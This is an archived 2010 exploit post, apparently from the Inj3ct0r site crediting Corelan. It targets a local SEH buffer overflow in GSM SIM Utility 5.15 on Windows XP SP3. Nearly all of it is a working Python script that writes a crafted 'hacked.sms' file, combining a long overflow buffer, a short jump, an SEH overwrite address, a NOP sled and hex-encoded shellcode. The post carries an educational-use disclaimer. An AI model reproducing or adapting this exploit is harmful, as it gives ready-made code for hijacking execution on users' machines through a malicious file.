GSM SIM Utility sms file Local SEH BoF
Posted on 28 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>GSM SIM Utility sms file Local SEH BoF</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================== GSM SIM Utility sms file Local SEH BoF ====================================== # Exploit Title : GSM SIM Utility sms file Local SEH BoF # Date : June 28, 2010 # Author : chap0 [www.seek-truth.net] # Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol # Version : 5.15 # OS : Windows XP SP3 # Type of vuln : SEH # Greetz to : Corelan Security Team * Special Greetz to Lincoln # Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054 # The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # Code: import time print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] GSM SIM Utility SEH Local Exploit " sc =("d9eb9bd97424f431d2b27a31c964" "8b71308b760c8b761c8b46088b7e" "208b36384f1875f35901d1ffe160" "8b6c24248b453c8b54057801ea8b" "4a188b5a2001ebe337498b348b01" "ee31ff31c0fcac84c0740ac1cf0d" "01c7e9f1ffffff3b7c242875de8b" "5a2401eb668b0c4b8b5a1c01eb8b" "048b01e88944241c61c3b20829d4" "89e589c2688e4e0eec52e89cffff" "ff894504bb7ed8e273871c2452e8" "8bffffff894508686c6c20ff6833" "322e646875736572885c240a89e6" "56ff550489c250bba8a24dbc871c" "2452e85effffff68703058206820" "6368616864204279686f69746568" "4578706c31db885c241289e3686b" "58202068426c6163687468652068" "75676820685468726f31c9884c24" "1189e131d252535152ffd031c050" "ff5508") buf= "A" * 1834 buf+= "eb069090" buf+= "F25E4300" buf+= "90" * 20 buf+= sc try: crash = open("hacked.sms",'w') crash.write(buf) crash.close() print "[+] Visit www.corelan.be port 8800! " except: print "Error occured, look at the code! " time.sleep(2) print "[+] Exploit file created! " # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
